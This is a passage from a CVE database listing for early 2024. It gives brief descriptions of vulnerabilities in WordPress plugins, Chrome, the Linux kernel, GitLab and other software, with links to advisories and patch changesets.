MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa26e958-4850-451b-88eb-d48fc0c7feb7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa26e958-4850-451b-88eb-d48fc0c7feb7?source=cve    Assigned (20240207)
CVE    2024    1321    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 3.4.2. This is due to the plugin allowing unauthenticated users to update the status of order payments. This makes it possible for unauthenticated attackers to book events for free.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve    Assigned (20240207)
CVE    2024    1320    Candidate    The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'offline_status' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve    Assigned (20240207)
CVE    2024    1319    Candidate    The Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the attendees list on any post type regardless of status (e.g. draft, private, pending review, password-protected, and trashed posts).    MISC:https://wpscan.com/vulnerability/5904dc7e-1058-4c40-bca3-66ba57b1414b/   |   URL:https://wpscan.com/vulnerability/5904dc7e-1058-4c40-bca3-66ba57b1414b/    Assigned (20240207)
CVE    2024    1318    Candidate    The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'feedzy_wizard_step_process' and 'import_status' functions in all versions up to, and including, 4.4.2. This makes it possible for authenticated attackers, with Contributor access and above, who are normally restricted to only being able to create posts rather than pages, to draft and publish posts with arbitrary content.    MISC:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-admin.php#L1053   |   URL:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-admin.php#L1053   |   MISC:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L1022   |   URL:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L1022   |   MISC:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php   |   URL:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/181edcec-a57d-4516-935d-6777d2de77ae?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/181edcec-a57d-4516-935d-6777d2de77ae?source=cve    Assigned (20240207)
CVE    2024    1317    Candidate    The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to SQL Injection via the ‘search_key’ parameter in all versions up to, and including, 4.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L2623   |   URL:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L2623   |   MISC:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php   |   URL:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve    Assigned (20240207)
CVE    2024    1316    Candidate    The Event Tickets and Registration WordPress plugin before 5.8.1 and the Events Tickets Plus WordPress plugin before 5.9.1 do not prevent users with at least the contributor role from leaking the existence of certain events they shouldn't have access to (e.g. draft, private, pending review, password-protected, and trashed events).    MISC:https://wpscan.com/vulnerability/d80dfe2f-207d-4cdf-8c71-27936c6318e5/   |   URL:https://wpscan.com/vulnerability/d80dfe2f-207d-4cdf-8c71-27936c6318e5/    Assigned (20240207)
CVE    2024    1312    Candidate    A use-after-free flaw was found in the Linux kernel's Memory Management subsystem when a user wins two races at the same time with a fail in the mas_prev_slot function. This issue could allow a local user to crash the system.    MISC:RHBZ#2225569   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2225569   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1312   |   URL:https://access.redhat.com/security/cve/CVE-2024-1312   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/mm/memory.c?h=v6.8-rc3&id=657b5146955eba331e01b9a6ae89ce2e716ba306   |   URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/mm/memory.c?h=v6.8-rc3&id=657b5146955eba331e01b9a6ae89ce2e716ba306    Assigned (20240207)
CVE    2024    1311    Candidate    The Brizy – Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeImages function in all versions up to, and including, 2.4.40. This makes it possible for authenticated attackers, with contributor access or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.    MISC:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L254   |   URL:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L254   |   MISC:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/zip/archiver.php   |   URL:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/zip/archiver.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve    Assigned (20240207)
CVE    2024    1309    Candidate    Uncontrolled Resource Consumption vulnerability in Honeywell Niagara Framework on Windows, Linux, QNX allows Content Spoofing. This issue affects Niagara Framework: before Niagara AX 3.8.1, before Niagara 4.1.    CERT-VN:VU#417980   |   URL:https://www.kb.cert.org/vuls/id/417980   |   MISC:https://process.honeywell.com   |   URL:https://process.honeywell.com   |   MISC:https://www.honeywell.com/us/en/product-security   |   URL:https://www.honeywell.com/us/en/product-security    Assigned (20240207)
CVE    2024    1304    Candidate    Cross-site scripting vulnerability in Badger Meter Monitool that affects versions 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially hijack their browser session.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool    Assigned (20240207)
CVE    2024    1303    Candidate    Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool    Assigned (20240207)
CVE    2024    1302    Candidate    Information exposure vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file, obtaining all sensitive information, such as database credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool    Assigned (20240207)
CVE    2024    1301    Candidate    SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool    Assigned (20240207)
CVE    2024    1299    Candidate    A privilege escalation vulnerability was discovered in GitLab affecting versions 16.8 prior to 16.8.4 and 16.9 prior to 16.9.2. It was possible for a user with custom role of `manage_group_access_tokens` to rotate group access tokens with owner privileges.    MISC:GitLab Issue #440745   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/440745   |   MISC:HackerOne Bug Bounty Report #2356976   |   URL:https://hackerone.com/reports/2356976   |   MISC:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/   |   URL:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/    Assigned (20240207)
CVE    2024    1297    Candidate    Loomio version 2.22.0 allows executing arbitrary commands on the server. This is possible because the application is vulnerable to OS Command Injection.    MISC:https://fluidattacks.com/advisories/stones   |   URL:https://fluidattacks.com/advisories/stones   |   MISC:https://github.com/loomio/loomio   |   URL:https://github.com/loomio/loomio    Assigned (20240206)
CVE    2024    1296    Candidate    The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block upload in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/post.php#L529   |   URL:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/post.php#L529   |   MISC:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L196   |   URL:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L196   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve    Assigned (20240206)
CVE    2024    1294    Candidate    The Sunshine Photo Cart: Free Client Galleries for Photographers plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.24 via the 'invoice'. This makes it possible for unauthenticated attackers to extract sensitive data including customer email and physical addresses.    MISC:https://plugins.trac.wordpress.org/browser/sunshine-photo-cart/tags/3.0.24/includes/admin/sunshine-order.php#L894   |   URL:https://plugins.trac.wordpress.org/browser/sunshine-photo-cart/tags/3.0.24/includes/admin/sunshine-order.php#L894   |   MISC:https://plugins.trac.wordpress.org/changeset/3033429/sunshine-photo-cart/trunk/includes/admin/sunshine-order.php   |   URL:https://plugins.trac.wordpress.org/changeset/3033429/sunshine-photo-cart/trunk/includes/admin/sunshine-order.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/da76d034-3e9a-4f3f-a314-48e776028369?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/da76d034-3e9a-4f3f-a314-48e776028369?source=cve    Assigned (20240206)
CVE    2024    1293    Candidate    The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the embedded media custom block in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/57dac6de-545f-49e5-9f45-d90a48d6b05f?source=cve    Assigned (20240206)
CVE    2024    1291    Candidate    The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown URL parameter in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve    Assigned (20240206)
CVE    2024    1290    Candidate    The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take over any accounts.    MISC:https://wpscan.com/vulnerability/a60187d4-9491-435a-bc36-8dd348a1ffa3/   |   URL:https://wpscan.com/vulnerability/a60187d4-9491-435a-bc36-8dd348a1ffa3/    Assigned (20240206)
CVE    2024    1288    Candidate    The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saswp_reviews_form_render' function in all versions up to, and including, 1.26. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's stored reCaptcha site and secret keys, potentially breaking the reCaptcha functionality.    MISC:https://plugins.svn.wordpress.org/schema-and-structured-data-for-wp/trunk/modules/reviews/reviews_form.php   |   URL:https://plugins.svn.wordpress.org/schema-and-structured-data-for-wp/trunk/modules/reviews/reviews_form.php   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve    Assigned (20240206)
CVE    2024    1285    Candidate    The Page Builder Sandwich – Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'gambit_builder_save_content' function in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and above, to insert arbitrary content into existing posts.    MISC:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/tags/5.1.0/class-page-builder-sandwich.php#L958   |   URL:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/tags/5.1.0/class-page-builder-sandwich.php#L958   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve    Assigned (20240206)
CVE    2024    1284    Candidate    Use after free in Mojo in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-364516d49a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KN32XXNHIR6KBS4BYQTZV2JQFN4D6ZSE/   |   FEDORA:FEDORA-2024-5745525066   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSCIL2WH2L4R4KWSRCTDWBPAMOJIYBJE/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html   |   MISC:https://issues.chromium.org/issues/41494539   |   URL:https://issues.chromium.org/issues/41494539    Assigned (20240206)
CVE    2024    1283    Candidate    Heap buffer overflow in Skia in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-364516d49a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KN32XXNHIR6KBS4BYQTZV2JQFN4D6ZSE/   |   FEDORA:FEDORA-2024-5745525066   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSCIL2WH2L4R4KWSRCTDWBPAMOJIYBJE/   |   MISC:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html   |   MISC:https://issues.chromium.org/issues/41494860   |   URL:https://issues.chromium.org/issues/41494860    Assigned (20240206)
CVE    2024    1282    Candidate    The Email Encoder – Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-helpers.php   |   URL:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-helpers.php   |   MISC:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-run.php   |   URL:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-run.php   |   MISC:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-validate.php   |   URL:https://plugins.trac.wordpress.org/browser/email-encoder-bundle/tags/2.2.0/core/includes/classes/class-email-encoder-bundle-validate.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve    Assigned (20240206)
CVE    2024    1279    Candidate    The Paid Memberships Pro WordPress plugin before 2.12.9 does not prevent user with at least the contributor role from leaking other users' sensitive metadata.    MISC:https://wpscan.com/vulnerability/4c537264-0c23-428e-9a11-7a9e74fb6b69/   |   URL:https://wpscan.com/vulnerability/4c537264-0c23-428e-9a11-7a9e74fb6b69/    Assigned (20240206)
CVE    2024    1278    Candidate    The Easy Social Feed – Social Photos Gallery – Post Feed – Like Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'efb_likebox' shortcode in all versions up to, and including, 6.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/tags/6.5.4/facebook/frontend/easy-facebook-likebox.php   |   URL:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/tags/6.5.4/facebook/frontend/easy-facebook-likebox.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b76bddf3-96ad-4bb0-a37b-33b451da6713?source=cve    Assigned (20240206)
CVE    2024    1277    Candidate    The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom fields in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L750   |   URL:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L750   |   MISC:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L756   |   URL:https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/post-settings/apply-settings.php#L756   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve    Assigned (20240206)
CVE    2024    1276    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Content Ticker arrow attribute in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.8/includes/Elements/Content_Ticker.php#L815   |   URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.8/includes/Elements/Content_Ticker.php#L815   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve    Assigned (20240206)
CVE    2024    1273    Candidate    The Starbox WordPress plugin before 3.5.0 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks    MISC:https://wpscan.com/vulnerability/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb/   |   URL:https://wpscan.com/vulnerability/9784d7c8-e3aa-42af-ace8-5b2b37ebc9cb/    Assigned (20240206)
CVE    2024    1269    Candidate    A vulnerability has been found in SourceCodester Product Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /supplier.php. The manipulation of the argument supplier_name/supplier_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253012.    MISC:https://github.com/PrecursorYork/Product-Management-System-Using-PHP-and-MySQL-Reflected-XSS-POC/blob/main/README.md   |   URL:https://github.com/PrecursorYork/Product-Management-System-Using-PHP-and-MySQL-Reflected-XSS-POC/blob/main/README.md   |   MISC:https://vuldb.com/?ctiid.253012   |   URL:https://vuldb.com/?ctiid.253012   |   MISC:https://vuldb.com/?id.253012   |   URL:https://vuldb.com/?id.253012    Assigned (20240206)
CVE    2024    1268    Candidate    A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011.    MISC:https://drive.google.com/drive/folders/1utXNnlH67FjUaBsYhw1cQWyZsO9MLy1i?usp=sharing   |   URL:https://drive.google.com/drive/folders/1utXNnlH67FjUaBsYhw1cQWyZsO9MLy1i?usp=sharing   |   MISC:https://vuldb.com/?ctiid.253011   |   URL:https://vuldb.com/?ctiid.253011   |   MISC:https://vuldb.com/?id.253011   |   URL:https://vuldb.com/?id.253011    Assigned (20240206)
CVE    2024    1267    Candidate    A vulnerability, which was classified as problematic, has been found in CodeAstro Restaurant POS System 1.0. Affected by this issue is some unknown functionality of the file create_account.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-253010 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/drive/folders/18N_20KuGPjrBbvOMSfbvBIc1sMKyycH3?usp=sharing   |   URL:https://drive.google.com/drive/folders/18N_20KuGPjrBbvOMSfbvBIc1sMKyycH3?usp=sharing   |   MISC:https://vuldb.com/?ctiid.253010   |   URL:https://vuldb.com/?ctiid.253010   |   MISC:https://vuldb.com/?id.253010   |   URL:https://vuldb.com/?id.253010    Assigned (20240206)
CVE    2024    1266    Candidate    A vulnerability classified as problematic was found in CodeAstro University Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /st_reg.php of the component Student Registration Form. The manipulation of the argument Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253009 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/16a9lQqUFBICw-Hhbe9bT5sSB7qwZjMwA/view?usp=sharing   |   URL:https://drive.google.com/file/d/16a9lQqUFBICw-Hhbe9bT5sSB7qwZjMwA/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.253009   |   URL:https://vuldb.com/?ctiid.253009   |   MISC:https://vuldb.com/?id.253009   |   URL:https://vuldb.com/?id.253009    Assigned (20240206)
CVE    2024    1265    Candidate    A vulnerability classified as problematic has been found in CodeAstro University Management System 1.0. Affected is an unknown function of the file /att_add.php of the component Attendance Management. The manipulation of the argument Student Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253008.    MISC:https://drive.google.com/file/d/1AnzEcwDC0AP56i65zCqekFAeYQY6skBH/view?usp=sharing   |   URL:https://drive.google.com/file/d/1AnzEcwDC0AP56i65zCqekFAeYQY6skBH/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.253008   |   URL:https://vuldb.com/?ctiid.253008   |   MISC:https://vuldb.com/?id.253008   |   URL:https://vuldb.com/?id.253008    Assigned (20240206)
